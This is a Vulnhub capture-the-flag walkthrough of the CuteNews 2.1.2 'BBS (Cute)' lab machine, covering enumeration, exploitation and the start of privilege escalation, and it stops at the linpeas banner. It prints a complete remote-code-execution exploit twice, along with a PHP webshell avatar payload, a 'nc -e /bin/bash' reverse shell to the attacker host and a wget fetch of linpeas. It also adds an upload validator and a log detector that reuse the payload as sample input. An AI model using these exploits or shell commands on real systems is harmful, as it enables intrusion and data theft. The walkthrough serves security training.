Vulnhub: BBS (Cute 1.0.2) machine, detailed walkthrough

BBS(Cute) 1.0.2

Machine name: BBS (cute): 1.0.2

Machine URL:

https://www.vulnhub.com/entry/bbs-cute-102,567/

Identifying the target host's IP address

┌──(kali㉿kali)-[~/Vulnhub/Cute_1.0.2]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.159.0/16   |   Screen View: Unique Hosts                                                                                                                                                           
                                                                                                                                                                                                                                
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                                                                                                                                
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:0a      1      60  Unknown vendor                                                                                                                                                               
 192.168.56.100  08:00:27:7d:6d:47      1      60  PCS Systemtechnik GmbH                                                                                                                                                       
 192.168.56.182  08:00:27:9f:a9:ca      1      60  PCS Systemtechnik GmbH   

Using the netdiscover tool on Kali Linux, the target host's IP address is identified as 192.168.56.182.

Nmap scan

Run a full-port scan of the target host with nmap:

┌──(kali㉿kali)-[~/Vulnhub/Cute_1.0.2]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.182 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-16 21:22 EST
Nmap scan report for bogon (192.168.56.182)
Host is up (0.00013s latency).
Not shown: 65530 closed tcp ports (reset)
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 04:d0:6e:c4:ba:4a:31:5a:6f:b3:ee:b8:1b:ed:5a:b7 (RSA)
|   256 24:b3:df:01:0b:ca:c2:ab:2e:e9:49:b0:58:08:6a:fa (ECDSA)
|_  256 6a:c4:35:6a:7a:1e:7e:51:85:5b:81:5c:7c:74:49:84 (ED25519)
80/tcp  open  http     Apache httpd 2.4.38 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.38 (Debian)
88/tcp  open  http     nginx 1.14.2
|_http-title: 404 Not Found
|_http-server-header: nginx/1.14.2
110/tcp open  pop3     Courier pop3d
|_pop3-capabilities: UTF8(USER) IMPLEMENTATION(Courier Mail Server) TOP UIDL PIPELINING STLS LOGIN-DELAY(10) USER
| ssl-cert: Subject: commonName=localhost/organizationName=Courier Mail Server/stateOrProvinceName=NY/countryName=US
| Subject Alternative Name: email:postmaster@example.com
| Not valid before: 2020-09-17T16:28:06
|_Not valid after:  2021-09-17T16:28:06
|_ssl-date: ERROR: Script execution failed (use -d to debug)
995/tcp open  ssl/pop3 Courier pop3d
|_pop3-capabilities: UTF8(USER) TOP IMPLEMENTATION(Courier Mail Server) UIDL LOGIN-DELAY(10) PIPELINING USER
| ssl-cert: Subject: commonName=localhost/organizationName=Courier Mail Server/stateOrProvinceName=NY/countryName=US
| Subject Alternative Name: email:postmaster@example.com
| Not valid before: 2020-09-17T16:28:06
|_Not valid after:  2021-09-17T16:28:06
MAC Address: 08:00:27:9F:A9:CA (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.22 seconds

The Nmap results show that the target host has five open ports: 22 (SSH), 80 (HTTP), 88 (HTTP), 110 (POP3) and 995 (POP3 over SSL).

Get Access

The SSH version on the target has no readily exploitable vulnerability, so we need to start from the other ports. HTTP services usually expose the most information and the most vulnerabilities, so we start there; HTTP is served on two ports. Visiting port 80 returns the Apache default page, so first check whether a robots.txt file exists:

┌──(kali㉿kali)-[~/Vulnhub/Cute_1.0.2]
└─$ curl http://192.168.56.182/robots.txt    
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache/2.4.38 (Debian) Server at 192.168.56.182 Port 80</address>
</body></html>

There is no robots.txt, so scan for directories that might be useful:

┌──(kali㉿kali)-[~/Vulnhub/Cute_1.0.2]
└─$ gobuster dir -u http://192.168.56.182 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt                       
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.182
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.2.0-dev
[+] Timeout:                 10s
===============================================================
2022/11/16 21:27:16 Starting gobuster in directory enumeration mode
===============================================================
/docs                 (Status: 301) [Size: 315] [--> http://192.168.56.182/docs/]
/uploads              (Status: 301) [Size: 318] [--> http://192.168.56.182/uploads/]
/skins                (Status: 301) [Size: 316] [--> http://192.168.56.182/skins/]
/core                 (Status: 301) [Size: 315] [--> http://192.168.56.182/core/]
/manual               (Status: 301) [Size: 317] [--> http://192.168.56.182/manual/]
/libs                 (Status: 301) [Size: 315] [--> http://192.168.56.182/libs/]
/cdata                (Status: 301) [Size: 316] [--> http://192.168.56.182/cdata/]
/server-status        (Status: 403) [Size: 279]
Progress: 219446 / 220561 (99.49%)===============================================================
2022/11/16 21:27:42 Finished
===============================================================

Gobuster found some directories, but every one of them returned status 301, which means there are further subdirectories or files beneath them. Re-run the scan with file extensions added:

┌──(kali㉿kali)-[~/Vulnhub/Cute_1.0.2]
└─$ gobuster dir -u http://192.168.56.182 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.txt,.html,.sh
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.182
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.2.0-dev
[+] Extensions:              php,txt,html,sh
[+] Timeout:                 10s
===============================================================
2022/11/16 21:31:27 Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
/index.html           (Status: 200) [Size: 10701]
/index.php            (Status: 200) [Size: 6175]
/search.php           (Status: 200) [Size: 5118]
/rss.php              (Status: 200) [Size: 105]
/docs                 (Status: 301) [Size: 315] [--> http://192.168.56.182/docs/]
/print.php            (Status: 200) [Size: 28]
/uploads              (Status: 301) [Size: 318] [--> http://192.168.56.182/uploads/]
/skins                (Status: 301) [Size: 316] [--> http://192.168.56.182/skins/]
/core                 (Status: 301) [Size: 315] [--> http://192.168.56.182/core/]
/manual               (Status: 301) [Size: 317] [--> http://192.168.56.182/manual/]
/popup.php            (Status: 200) [Size: 28]
/captcha.php          (Status: 200) [Size: 92]
/LICENSE.txt          (Status: 200) [Size: 3119]
/example.php          (Status: 200) [Size: 9522]
/libs                 (Status: 301) [Size: 315] [--> http://192.168.56.182/libs/]
/snippet.php          (Status: 200) [Size: 0]
/show_news.php        (Status: 200) [Size: 2987]
/cdata                (Status: 301) [Size: 316] [--> http://192.168.56.182/cdata/]
/.php                 (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
/server-status        (Status: 403) [Size: 279]
/show_archives.php    (Status: 200) [Size: 0]
Progress: 1101158 / 1102805 (99.85%)===============================================================
2022/11/16 21:33:47 Finished
===============================================================
                                                               

This time Gobuster was run with the file-extension option and found quite a few different pages. In particular, /index.php is a user login page, and it discloses the software version: [CuteNews 2.1.2]. I first wondered about SQL injection or bypassing the login; anyway, since the version is known, check whether that version has a known and easily exploitable vulnerability:

┌──(kali㉿kali)-[~/Vulnhub/Cute_1.0.2]
└─$ searchsploit cutenews                                      
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                                                                                 |  Path
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
CuteNews - 'page' Local File Inclusion                                                                                                                                                         | php/webapps/15208.txt
CuteNews 0.88 - 'comments.php' Remote File Inclusion                                                                                                                                           | php/webapps/22285.txt
CuteNews 0.88 - 'search.php' Remote File Inclusion                                                                                                                                             | php/webapps/22284.txt
CuteNews 0.88 - 'shownews.php' Remote File Inclusion                                                                                                                                           | php/webapps/22283.txt
CuteNews 0.88/1.3 - 'example1.php' Cross-Site Scripting                                                                                                                                        | php/webapps/24238.txt
CuteNews 0.88/1.3 - 'example2.php' Cross-Site Scripting                                                                                                                                        | php/webapps/24239.txt
CuteNews 0.88/1.3 - 'show_archives.php' Cross-Site Scripting                                                                                                                                   | php/webapps/24240.txt
CuteNews 0.88/1.3.x - 'index.php' Cross-Site Scripting                                                                                                                                         | php/webapps/24566.txt
CuteNews 1.1.1 - 'html.php' Remote Code Execution                                                                                                                                              | php/webapps/4851.txt
CuteNews 1.3 - Comment HTML Injection                                                                                                                                                          | php/webapps/24290.txt
CuteNews 1.3 - Debug Query Information Disclosure                                                                                                                                              | php/webapps/23406.txt
CuteNews 1.3.1 - 'show_archives.php' Cross-Site Scripting                                                                                                                                      | php/webapps/24372.txt
CuteNews 1.3.6 - 'result' Cross-Site Scripting                                                                                                                                                 | php/webapps/29217.txt
CuteNews 1.4.0 - Shell Injection / Remote Command Execution                                                                                                                                    | php/webapps/1221.php
CuteNews 1.4.1 - 'categories.mdu' Remote Command Execution                                                                                                                                     | php/webapps/1400.pl
CuteNews 1.4.1 - 'function.php' Local File Inclusion                                                                                                                                           | php/webapps/1612.php
CuteNews 1.4.1 - 'search.php' Multiple Cross-Site Scripting Vulnerabilities                                                                                                                    | php/webapps/27819.txt
CuteNews 1.4.1 - 'show_archives.php' Traversal Arbitrary File Access                                                                                                                           | php/webapps/26465.txt
CuteNews 1.4.1 - 'show_news.php' Cross-Site Scripting                                                                                                                                          | php/webapps/27252.txt
CuteNews 1.4.1 - 'template' Traversal Arbitrary File Access                                                                                                                                    | php/webapps/26466.txt
CuteNews 1.4.1 - Multiple Cross-Site Scripting Vulnerabilities                                                                                                                                 | php/webapps/27740.txt
CuteNews 1.4.1 - Shell Injection / Remote Command Execution                                                                                                                                    | php/webapps/1289.php
CuteNews 1.4.5 - 'rss_title' Cross-Site Scripting                                                                                                                                              | php/webapps/29159.txt
CuteNews 1.4.5 - 'show_news.php' Cross-Site Scripting                                                                                                                                          | php/webapps/29158.txt
CuteNews 1.4.5 - Admin Password md5 Hash Fetching                                                                                                                                              | php/webapps/4779.php
CuteNews 1.4.6 - 'from_date_day' Full Path Disclosure                                                                                                                                          | php/webapps/33341.txt
CuteNews 1.4.6 - 'index.php' Cross-Site Request Forgery (New User Creation)                                                                                                                    | php/webapps/33344.txt
CuteNews 1.4.6 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities                                                                                                                     | php/webapps/33340.txt
CuteNews 1.4.6 - 'ip ban' Authorized Cross-Site Scripting / Command Execution                                                                                                                  | php/webapps/7700.php
CuteNews 1.4.6 - 'result' Cross-Site Scripting                                                                                                                                                 | php/webapps/33343.txt
CuteNews 1.4.6 - 'search.php' Multiple Cross-Site Scripting Vulnerabilities                                                                                                                    | php/webapps/33342.txt
CuteNews 1.4.6 editnews Module - doeditnews Action Admin Moderation Bypass                                                                                                                     | php/webapps/33345.txt
CuteNews 2.0.3 - Arbitrary File Upload                                                                                                                                                         | php/webapps/37474.txt
CuteNews 2.1.2 - 'avatar' Remote Code Execution (Metasploit)                                                                                                                                   | php/remote/46698.rb
CuteNews 2.1.2 - Arbitrary File Deletion                                                                                                                                                       | php/webapps/48447.txt
CuteNews 2.1.2 - Authenticated Arbitrary File Upload                                                                                                                                           | php/webapps/48458.txt
CuteNews 2.1.2 - Remote Code Execution                                                                                                                                                         | php/webapps/48800.py
CuteNews aj-fork - 'path' Remote File Inclusion                                                                                                                                                | php/webapps/32570.txt
CuteNews aj-fork 167f - 'cutepath' Remote File Inclusion                                                                                                                                       | php/webapps/2891.txt
CuteNews and UTF-8 CuteNews - Multiple Vulnerabilities                                                                                                                                         | php/webapps/10002.txt
CutePHP CuteNews 1.3 - HTML Injection                                                                                                                                                          | php/webapps/22842.txt
CutePHP CuteNews 1.3.6 - 'x-forwarded-for' Script Injection                                                                                                                                    | php/webapps/25177.txt
CutePHP CuteNews 1.4.1 - 'index.php' Cross-Site Scripting                                                                                                                                      | php/webapps/27356.txt
CutePHP CuteNews 1.4.1 Editnews Module - Cross-Site Scripting                                                                                                                                  | php/webapps/27676.txt
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
                                                   

An exciting set of results, haha: there is a Metasploit module, but searching in msfconsole turned up nothing, so I searched the web again for CuteNews 2.1.2 exploit code and found a Python exploit at the following link:

https://www.exploit-db.com/exploits/48800

┌──(kali㉿kali)-[~/Vulnhub/Cute_1.0.2]
└─$ cat exploit.py
# Exploit Title: CuteNews 2.1.2 - Remote Code Execution
# Google Dork: N/A
# Date: 2020-09-10
# Exploit Author: Musyoka Ian
# Vendor Homepage: https://cutephp.com/cutenews/downloading.php
# Software Link: https://cutephp.com/cutenews/downloading.php
# Version: CuteNews 2.1.2
# Tested on: Ubuntu 20.04, CuteNews 2.1.2
# CVE : CVE-2019-11447

#! /bin/env python3

import requests
from base64 import b64decode
import io
import re
import string
import random
import sys


banner = """


           _____     __      _  __                     ___   ___  ___ 
          / ___/_ __/ /____ / |/ /__ _    _____       |_  | <  / |_  |
         / /__/ // / __/ -_)    / -_) |/|/ (_-<      / __/_ / / / __/ 
         \___/\_,_/\__/\__/_/|_/\__/|__,__/___/     /____(_)_(_)____/ 
                                ___  _________                        
                               / _ \/ ___/ __/                        
                              / , _/ /__/ _/                          
                             /_/|_|\___/___/                          
                                                                    
                                                                                                                                                   
"""
print (banner)
print ("[->] Usage python3 expoit.py")
print ()
sess = requests.session()
payload = "GIF8;\n<?php system($_REQUEST['cmd']) ?>"
ip = input("Enter the URL> ")
def extract_credentials():
    global sess, ip
    url = f"{ip}/CuteNews/cdata/users/lines"
    encoded_creds = sess.get(url).text
    buff = io.StringIO(encoded_creds)
    chash = buff.readlines()
    if "Not Found" in encoded_creds:
            print ("[-] No hashes were found skipping!!!")
            return
    else:
        for line in chash:
            if "<?php die('Direct call - access denied'); ?>" not in line:
                credentials = b64decode(line)
                try:
                    sha_hash = re.search('"pass";s:64:"(.*?)"', credentials.decode()).group(1)
                    print (sha_hash)
                except:
                    pass
def register():
    global sess, ip
    userpass = "".join(random.SystemRandom().choice(string.ascii_letters + string.digits ) for _ in range(10))
    postdata = {
        "action" : "register",
        "regusername" : userpass,
        "regnickname" : userpass,
        "regpassword" : userpass,
        "confirm" : userpass,
        "regemail" : f"{userpass}@hack.me"
    }
    register = sess.post(f"{ip}/CuteNews/index.php?register", data = postdata, allow_redirects = False)
    if 302 == register.status_code:
        print (f"[+] Registration successful with username: {userpass} and password: {userpass}")
    else:
        sys.exit()
def send_payload(payload):
    global ip
    token = sess.get(f"{ip}/CuteNews/index.php?mod=main&opt=personal").text
    signature_key = re.search('signature_key" value="(.*?)"', token).group(1)
    signature_dsi = re.search('signature_dsi" value="(.*?)"', token).group(1)
    logged_user = re.search('disabled="disabled" value="(.*?)"', token).group(1)
    print (f"signature_key: {signature_key}")
    print (f"signature_dsi: {signature_dsi}")
    print (f"logged in user: {logged_user}")

    files = {
        "mod" : (None, "main"),
        "opt" : (None, "personal"),
        "__signature_key" : (None, f"{signature_key}"),
        "__signature_dsi" : (None, f"{signature_dsi}"),
        "editpassword" : (None, ""),
        "confirmpassword" : (None, ""),
        "editnickname" : (None, logged_user),
        "avatar_file" : (f"{logged_user}.php", payload),
        "more[site]" : (None, ""),
        "more[about]" : (None, "")
    }
    payload_send = sess.post(f"{ip}/CuteNews/index.php", files = files).text
    print("============================\nDropping to a SHELL\n============================")
    while True:
        print ()
        command = input("command > ")
        postdata = {"cmd" : command}
        output = sess.post(f"{ip}/CuteNews/uploads/avatar_{logged_user}_{logged_user}.php", data=postdata)
        if 404 == output.status_code:
            print ("sorry i can't find your webshell try running the exploit again")
            sys.exit()
        else:
            output = re.sub("GIF8;", "", output.text)
            print (output.strip())

if __name__ == "__main__":
    print ("================================================================\nUsers SHA-256 HASHES TRY CRACKING THEM WITH HASHCAT OR JOHN\n================================================================")
    extract_credentials()
    print ("================================================================")
    print()
    print ("=============================\nRegistering a users\n=============================")
    register()
    print()
    print("=======================================================\nSending Payload\n=======================================================")
    send_payload(payload)
    print () 

Running this exploit, however, produced errors. After repeated attempts it turned out that the /CuteNews path segment in the code above has to be removed, giving:

┌──(kali㉿kali)-[~/Vulnhub/Cute_1.0.2]
└─$ cat exploit_modified.py 
# Exploit Title: CuteNews 2.1.2 - Remote Code Execution
# Google Dork: N/A
# Date: 2020-09-10
# Exploit Author: Musyoka Ian
# Vendor Homepage: https://cutephp.com/cutenews/downloading.php
# Software Link: https://cutephp.com/cutenews/downloading.php
# Version: CuteNews 2.1.2
# Tested on: Ubuntu 20.04, CuteNews 2.1.2
# CVE : CVE-2019-11447

#! /bin/env python3

import requests
from base64 import b64decode
import io
import re
import string
import random
import sys


banner = """


           _____     __      _  __                     ___   ___  ___ 
          / ___/_ __/ /____ / |/ /__ _    _____       |_  | <  / |_  |
         / /__/ // / __/ -_)    / -_) |/|/ (_-<      / __/_ / / / __/ 
         \___/\_,_/\__/\__/_/|_/\__/|__,__/___/     /____(_)_(_)____/ 
                                ___  _________                        
                               / _ \/ ___/ __/                        
                              / , _/ /__/ _/                          
                             /_/|_|\___/___/                          
                                                                      

                                                                                                                                                   
"""
print (banner)
print ("[->] Usage python3 expoit.py")
print ()
sess = requests.session()
payload = "GIF8;\n<?php system($_REQUEST['cmd']) ?>"
ip = input("Enter the URL> ")
def extract_credentials():
    global sess, ip
    url = f"{ip}/cdata/users/lines"
    encoded_creds = sess.get(url).text
    buff = io.StringIO(encoded_creds)
    chash = buff.readlines()
    if "Not Found" in encoded_creds:
            print ("[-] No hashes were found skipping!!!")
            return
    else:
        for line in chash:
            if "<?php die('Direct call - access denied'); ?>" not in line:
                credentials = b64decode(line)
                try:
                    sha_hash = re.search('"pass";s:64:"(.*?)"', credentials.decode()).group(1)
                    print (sha_hash)
                except:
                    pass
def register():
    global sess, ip
    userpass = "".join(random.SystemRandom().choice(string.ascii_letters + string.digits ) for _ in range(10))
    postdata = {
        "action" : "register",
        "regusername" : userpass,
        "regnickname" : userpass,
        "regpassword" : userpass,
        "confirm" : userpass,
        "regemail" : f"{userpass}@hack.me"
    }
    register = sess.post(f"{ip}/index.php?register", data = postdata, allow_redirects = False)
    if 302 == register.status_code:
        print (f"[+] Registration successful with username: {userpass} and password: {userpass}")
    else:
        sys.exit()
def send_payload(payload):
    global ip
    token = sess.get(f"{ip}/index.php?mod=main&opt=personal").text
    signature_key = re.search('signature_key" value="(.*?)"', token).group(1)
    signature_dsi = re.search('signature_dsi" value="(.*?)"', token).group(1)
    logged_user = re.search('disabled="disabled" value="(.*?)"', token).group(1)
    print (f"signature_key: {signature_key}")
    print (f"signature_dsi: {signature_dsi}")
    print (f"logged in user: {logged_user}")

    files = {
        "mod" : (None, "main"),
        "opt" : (None, "personal"),
        "__signature_key" : (None, f"{signature_key}"),
        "__signature_dsi" : (None, f"{signature_dsi}"),
        "editpassword" : (None, ""),
        "confirmpassword" : (None, ""),
        "editnickname" : (None, logged_user),
        "avatar_file" : (f"{logged_user}.php", payload),
        "more[site]" : (None, ""),
        "more[about]" : (None, "")
    }
    payload_send = sess.post(f"{ip}/index.php", files = files).text
    print("============================\nDropping to a SHELL\n============================")
    while True:
        print ()
        command = input("command > ")
        postdata = {"cmd" : command}
        output = sess.post(f"{ip}/uploads/avatar_{logged_user}_{logged_user}.php", data=postdata)
        if 404 == output.status_code:
            print ("sorry i can't find your webshell try running the exploit again")
            sys.exit()
        else:
            output = re.sub("GIF8;", "", output.text)
            print (output.strip())

if __name__ == "__main__":
    print ("================================================================\nUsers SHA-256 HASHES TRY CRACKING THEM WITH HASHCAT OR JOHN\n================================================================")
    extract_credentials()
    print ("================================================================")
    print()
    print ("=============================\nRegistering a users\n=============================")
    register()
    print()
    print("=======================================================\nSending Payload\n=======================================================")
    send_payload(payload)
    print ()
             

In other words, the URLs in exploit code downloaded from the web have to be adapted to the actual deployment (the earlier directory scan already revealed the directory layout, so /CuteNews had to be deleted from the original exploit.py).

After the modification, running the script gives a shell that can execute commands:
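The exploit works because the CuteNews personal-settings form stores an avatar under the client's file name, so a name ending in .php with a PHP body behind a fake "GIF8;" header lands in /uploads/ as an executable script. The following is an added example, not code from this writeup or from CuteNews: a server-side validation routine in Python (the function names validate_avatar and storage_name and the type table are my own) that refuses exactly that upload by checking the extension, the real image magic bytes and the body for script markers, and that never lets the client's file name reach disk.

```python
import re

# Allowed avatar extensions and the magic bytes a real image of that type starts with.
# (Assumed policy for this example; adjust to whatever your site actually permits.)
ALLOWED_TYPES = {
    "gif": (b"GIF87a", b"GIF89a"),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
}

# Byte patterns that must never appear in an avatar, whatever its header claims.
SERVER_SIDE_MARKERS = (b"<?php", b"<?=", b"<script")

# Extensions that a web server with mod_php might execute if they occur anywhere in the name.
EXECUTABLE_TOKENS = ("php", "phtml", "phar", "php5", "php7")


def validate_avatar(filename, content):
    """Return (ok, reason). Reject anything that is not a genuine image of an allowed type."""
    # 1. Strip any path, then look only at the dot-separated parts of the name.
    name = filename.rsplit("/", 1)[-1].lower()
    parts = name.split(".")
    if len(parts) < 2:
        return False, "no extension"
    ext = parts[-1]
    if ext not in ALLOWED_TYPES:
        return False, f"extension .{ext} not allowed"
    # "user.php.gif" has an allowed last extension but still carries a PHP token.
    if any(p in EXECUTABLE_TOKENS for p in parts[:-1]):
        return False, "executable extension embedded in name"
    # 2. The body must start with the real magic bytes of the declared type.
    #    "GIF8;" passes a naive startswith(b"GIF8") check but is not a valid GIF header.
    if not content.startswith(ALLOWED_TYPES[ext]):
        return False, "content does not match declared image type"
    # 3. Even a genuine image can carry PHP in trailing data; refuse those as well.
    if any(marker in content for marker in SERVER_SIDE_MARKERS):
        return False, "server-side code marker inside image data"
    return True, "ok"


def storage_name(username, ext):
    """Server-chosen file name: only a sanitised user name and the validated extension are used."""
    safe_user = re.sub(r"[^a-z0-9_]", "", username.lower())
    return f"avatar_{safe_user}.{ext}"


if __name__ == "__main__":
    # Constructed inputs: the first mirrors the payload and file name used by the exploit above.
    samples = [
        ("ZrRZahiam0.php", b"GIF8;\n<?php system($_REQUEST['cmd']) ?>"),
        ("ZrRZahiam0.gif", b"GIF8;\n<?php system($_REQUEST['cmd']) ?>"),
        ("ZrRZahiam0.gif", b"GIF89a\x01\x00\x01\x00<?php echo 1; ?>"),
        ("ZrRZahiam0.php.gif", b"GIF89a\x01\x00\x01\x00\x80\x00\x00"),
        ("ZrRZahiam0.gif", b"GIF89a\x01\x00\x01\x00\x80\x00\x00"),
    ]
    for fname, body in samples:
        ok, reason = validate_avatar(fname, body)
        print(f"{fname:22s} -> {'accept' if ok else 'reject'}: {reason}")
```

Validation like this belongs together with a web-server rule that refuses to execute scripts under the upload directory at all (for Apache 2.4, a `<FilesMatch "\.php$">` block containing `Require all denied`, placed in the configuration for that directory), so that a file which somehow passes the checks is still never run.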

┌──(kali㉿kali)-[~/Vulnhub/Cute_1.0.2]
└─$ python exploit_modified.py 



           _____     __      _  __                     ___   ___  ___ 
          / ___/_ __/ /____ / |/ /__ _    _____       |_  | <  / |_  |
         / /__/ // / __/ -_)    / -_) |/|/ (_-<      / __/_ / / / __/ 
         \___/\_,_/\__/\__/_/|_/\__/|__,__/___/     /____(_)_(_)____/ 
                                ___  _________                        
                               / _ \/ ___/ __/                        
                              / , _/ /__/ _/                          
                             /_/|_|\___/___/                          
                                                                      

                                                                                                                                                   

[->] Usage python3 expoit.py

Enter the URL> http://192.168.56.182
================================================================
Users SHA-256 HASHES TRY CRACKING THEM WITH HASHCAT OR JOHN
================================================================
[-] No hashes were found skipping!!!
================================================================

=============================
Registering a users
=============================
[+] Registration successful with username: ZrRZahiam0 and password: ZrRZahiam0

=======================================================
Sending Payload
=======================================================
signature_key: 91ab8a9e4310405881f0e7c9a0fb4c8c-ZrRZahiam0
signature_dsi: d6e1008e1aefde67a540b3303d26212d
logged in user: ZrRZahiam0
============================
Dropping to a SHELL
============================

command > id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

command > 
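From the defender's side, the run above leaves a distinctive trail in the Apache access log: a read of /cdata/users/lines, a registration, a multipart POST to index.php, and then repeated POSTs to a .php file under /uploads/. The block below is an added example and not part of the writeup: it parses constructed combined-format log lines (the sample entries, rule names and function names are mine; the paths mirror the ones seen in this walkthrough) and flags the two patterns that should never occur on a healthy CuteNews installation.

```python
import re
from collections import Counter

# Apache combined log format: host ident user [time] "request" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Detection rules derived from the walkthrough. The first deliberately also matches
# double extensions such as /uploads/x.php.png, since mod_php may execute those.
RULES = [
    ("script_in_uploads", re.compile(r"^/uploads/[^?]*\.php", re.I)),
    ("user_db_read", re.compile(r"^/cdata/users/", re.I)),
]


def parse_line(line):
    """Return a dict of fields for one log line, or None if it is not combined-format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def detect(lines):
    """Return (rule, ip, method, path, status) for every request matching a rule."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        # Matches are reported regardless of status: a 404 here still fingerprints the
        # exploit script probing for the user database, a 200 means it succeeded.
        for name, pattern in RULES:
            if pattern.search(rec["path"]):
                hits.append((name, rec["ip"], rec["method"], rec["path"], rec["status"]))
    return hits


def summarize(hits):
    """Count hits per (rule, source ip) so the noisy client stands out."""
    return Counter((name, ip) for name, ip, *_ in hits)


# Constructed sample log lines (not taken from the machine).
SAMPLE_LOG = [
    '192.168.56.137 - - [17/Nov/2022:04:00:01 -0500] "GET /cdata/users/lines HTTP/1.1" 200 512 "-" "python-requests/2.28"',
    '192.168.56.137 - - [17/Nov/2022:04:00:02 -0500] "POST /index.php?register HTTP/1.1" 302 0 "-" "python-requests/2.28"',
    '192.168.56.137 - - [17/Nov/2022:04:00:03 -0500] "POST /index.php HTTP/1.1" 200 6175 "-" "python-requests/2.28"',
    '192.168.56.137 - - [17/Nov/2022:04:00:04 -0500] "POST /uploads/avatar_ZrRZahiam0_ZrRZahiam0.php HTTP/1.1" 200 58 "-" "python-requests/2.28"',
    '192.168.56.1 - - [17/Nov/2022:04:00:05 -0500] "GET /skins/default.css HTTP/1.1" 200 2048 "http://192.168.56.182/" "Mozilla/5.0"',
    '192.168.56.1 - - [17/Nov/2022:04:00:06 -0500] "GET /uploads/avatar_ZrRZahiam0_ZrRZahiam0.png HTTP/1.1" 200 1200 "-" "Mozilla/5.0"',
    "garbage line that does not parse",
]

if __name__ == "__main__":
    found = detect(SAMPLE_LOG)
    for hit in found:
        print("ALERT", *hit)
    for (rule, ip), count in summarize(found).items():
        print(f"{ip} triggered {rule} {count}x")
```

In practice the same two rules map directly onto a web-server hardening check: a healthy install serves nothing executable from /uploads/ and returns 403 for anything under /cdata/, so any 200 on either path is a misconfiguration worth fixing before it is an incident.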

This shell is awkward to work with, so spawn a separate one:

command > nc -e /bin/bash 192.168.56.137 6666

This gives a second shell on Kali Linux:

┌──(kali㉿kali)-[~/Vulnhub/Cute_1.0.2]
└─$ sudo nc -nlvp 6666            
[sudo] password for kali: 
listening on [any] 6666 ...
connect to [192.168.56.137] from (UNKNOWN) [192.168.56.182] 49586
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
which python
/usr/bin/python
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@cute:/home/fox$ cat user.txt
cat user.txt
dcb8189a0eaf7a690a67785a7299be60

User flag obtained. Note that www-data could read /home/fox/user.txt directly, so no lateral move to the fox account was needed.

Privilege escalation

Next, escalate privileges. Serve linpeas.sh from Kali with Python's built-in HTTP server (`python3 -m http.server 8000` in the directory holding the script), fetch it on the target with wget into /tmp, make it executable and run it:

www-data@cute:/home/fox$ cd /tmp
cd /tmp
www-data@cute:/tmp$ wget http://192.168.56.137:8000/linpeas.sh
wget http://192.168.56.137:8000/linpeas.sh
--2022-11-17 04:01:43--  http://192.168.56.137:8000/linpeas.sh
Connecting to 192.168.56.137:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 827827 (808K) [text/x-sh]
Saving to: 'linpeas.sh'

linpeas.sh          100%[===================>] 808.42K  --.-KB/s    in 0.003s  

2022-11-17 04:01:43 (235 MB/s) - 'linpeas.sh' saved [827827/827827]

www-data@cute:/tmp$ chmod +x linpeas.sh
chmod +x linpeas.sh
www-data@cute:/tmp$ ./linpeas.sh
./linpeas.sh


(linpeas ASCII banner and sponsor box omitted)
          linpeas-ng by carlospolop
                                                                                                                                                                                                                                   
Linux Privesc Checklist: https://book.hacktricks.xyz/linux-hardening/linux-privilege-escalation-checklist
 LEGEND:                                                                                                                                                                                                                           
  RED/YELLOW: 95% a PE vector
  RED: You should take a look to it
  LightCyan: Users with console
  Blue: Users without console & mounted devs
  Green: Common things (users, groups, SUID/SGID, mounts, .sh scripts, cronjobs) 
  LightMagenta: Your username

 Starting linpeas. Caching Writable Folders...

                               ╔═══════════════════╗
